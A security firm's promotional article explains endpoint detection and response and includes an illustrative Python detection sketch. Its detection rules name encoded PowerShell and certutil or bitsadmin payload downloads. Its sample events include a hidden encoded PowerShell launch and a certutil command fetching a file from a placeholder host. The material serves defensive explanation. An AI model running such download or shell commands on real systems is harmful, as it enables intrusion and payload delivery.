Time to detection is a critical metric when dealing with security incidents because the faster an incident is detected, the faster it can be contained, mitigated, and remediated. The longer it takes to detect, the more time the attacker has to move laterally within the network, steal sensitive data, or cause damage to the system.
As a result, CodeBlue's security team strongly recommends that all New Zealand SMBs consider upgrading their endpoint protection to an EDR platform where feasible.
What is Endpoint Detection and Response (EDR)?
Endpoint Detection and Response (EDR) is the modern successor to traditional antivirus. Traditional antivirus protects endpoints mainly by matching files against a database of known malware signatures, so it struggles with anything it has not seen before. EDR instead records process, file, network and user activity on the endpoint and applies behavioural analysis and machine-learning models to that telemetry in real time, looking for malicious or anomalous patterns rather than relying on known signatures alone.
When an EDR system detects a compromise it initiates a response, such as killing the offending process or isolating the host from the network, and gives security teams an extra layer of visibility against previously unknown (zero-day) threats for which no signature yet exists.
CodeBlue’s Managed Endpoint Detection and Response (MDR)
CodeBlue's Managed Endpoint Detection and Response (MDR) utilises a next-generation endpoint agent powered by SentinelOne. The agent applies machine-learning (ML) and behavioural detection on the endpoint itself and streams the relevant telemetry back to our Security Operations Centre (SOC). Our SOC enriches that data with threat intelligence to correlate trends and pinpoint artifacts of interest, and our analysts then investigate those artifacts. If an actionable alert is identified, it is relayed to the client as an easy-to-understand response plan, along with the supporting evidence.
Agents are deployed on client workstations and servers, whether on-premises or in cloud workloads. These agents record system activity and compare it against an internal knowledge base of rulesets and behavioural patterns.
The results of this analysis, along with the necessary metadata, are sent to CodeBlue's SOC for enrichment against our threat database and global AI analysis engine. Furthermore, because EDR agents continuously record endpoint telemetry (process, file and network activity), our SOC can retain and query information that traditional antivirus never captures, for example to trace which hosts executed a trojanised software update during a supply chain attack.
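As an added illustration (not CodeBlue's or SentinelOne's code), the following Python sketch shows the two stages described above on constructed process events: the agent-side step evaluates behavioural rules alongside a signature-style hash lookup, and the SOC-side step correlates hits by host and runs the kind of telemetry query a supply chain hunt needs (which hosts ran a given binary). Event fields, rule names, hashes, hostnames and command lines are all assumptions made for the example.

```python
"""Illustrative EDR-style detection over constructed process events.

This is example code written for this article; it is not the SentinelOne
agent or CodeBlue's SOC tooling. All hosts, hashes and command lines are
made up.
"""
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    host: str       # endpoint that produced the event
    parent: str     # parent process image name
    image: str      # image name of the newly created process
    cmdline: str    # full command line
    sha256: str     # hash of the executed image


# Signature-style lookup: what traditional antivirus does. Constructed hash.
KNOWN_BAD_SHA256 = {"deadbeef" * 8: "ExampleDropper"}

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
ENCODED_FLAGS = {"-enc", "-encodedcommand", "-e", "-ec"}


def rule_known_bad_hash(ev: ProcessEvent) -> bool:
    return ev.sha256.lower() in KNOWN_BAD_SHA256


def rule_office_spawns_shell(ev: ProcessEvent) -> bool:
    # An Office application launching a scripting host is classic macro behaviour.
    return ev.parent.lower() in OFFICE_APPS and ev.image.lower() in SHELLS


def rule_encoded_powershell(ev: ProcessEvent) -> bool:
    tokens = {t.lower() for t in ev.cmdline.split()}
    return ev.image.lower() == "powershell.exe" and bool(tokens & ENCODED_FLAGS)


def rule_lolbin_download(ev: ProcessEvent) -> bool:
    # Built-in Windows tools abused to fetch a payload (living off the land).
    cl = ev.cmdline.lower()
    img = ev.image.lower()
    return (img == "certutil.exe" and "urlcache" in cl) or (
        img == "bitsadmin.exe" and "/transfer" in cl)


RULES = [
    ("KnownBadHash", "high", rule_known_bad_hash),
    ("OfficeSpawnsShell", "medium", rule_office_spawns_shell),
    ("EncodedPowerShell", "medium", rule_encoded_powershell),
    ("LolbinDownload", "medium", rule_lolbin_download),
]


def analyse(events):
    """Agent-side stage: evaluate every recorded event against every rule."""
    hits = []
    for ev in events:
        for name, severity, predicate in RULES:
            if predicate(ev):
                hits.append({"host": ev.host, "rule": name, "severity": severity,
                             "image": ev.image, "cmdline": ev.cmdline,
                             "sha256": ev.sha256})
    return hits


def correlate(hits):
    """SOC-side stage: group hits per host and escalate when several distinct
    behaviours, or any signature hit, land on the same machine."""
    by_host = defaultdict(list)
    for hit in hits:
        by_host[hit["host"]].append(hit)
    alerts = {}
    for host, host_hits in by_host.items():
        rules = sorted({h["rule"] for h in host_hits})
        escalate = len(rules) >= 2 or any(h["severity"] == "high" for h in host_hits)
        alerts[host] = {"severity": "high" if escalate else "medium",
                        "rules": rules, "evidence": host_hits}
    return alerts


def hosts_that_ran(events, sha256: str):
    """Telemetry query antivirus cannot answer: every host that executed
    a given binary, e.g. a trojanised update in a supply chain attack."""
    return sorted({ev.host for ev in events if ev.sha256.lower() == sha256.lower()})


# Constructed sample telemetry (hypothetical hosts and command lines).
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "winword.exe", "powershell.exe",
                 "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0A", "11" * 32),
    ProcessEvent("ws01", "powershell.exe", "certutil.exe",
                 "certutil.exe -urlcache -split -f http://example.invalid/a.dat a.dat", "22" * 32),
    ProcessEvent("ws02", "explorer.exe", "chrome.exe", "chrome.exe --profile-directory=Default", "33" * 32),
    ProcessEvent("srv01", "services.exe", "svchost.exe", "svchost.exe -k netsvcs", "44" * 32),
    ProcessEvent("ws03", "explorer.exe", "updater.exe", "updater.exe /silent", "deadbeef" * 8),
]

if __name__ == "__main__":
    for host, alert in correlate(analyse(SAMPLE_EVENTS)).items():
        print(host, alert["severity"], alert["rules"])
    print("ran ExampleDropper:", hosts_that_ran(SAMPLE_EVENTS, "deadbeef" * 8))
```

Note that ws03 is caught only by the hash lookup, which is all antivirus would have had, while ws01 never executes a known-bad file at all: it is the chain of behaviours (Office spawning an encoded PowerShell, which then uses certutil to download) that raises the alert, and the same recorded telemetry is what lets the SOC answer "which hosts ran this binary" after the fact.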
We hope this information explains the importance of upgrading your endpoint protection beyond traditional antivirus. CodeBlue recommends a Managed Endpoint Detection and Response platform.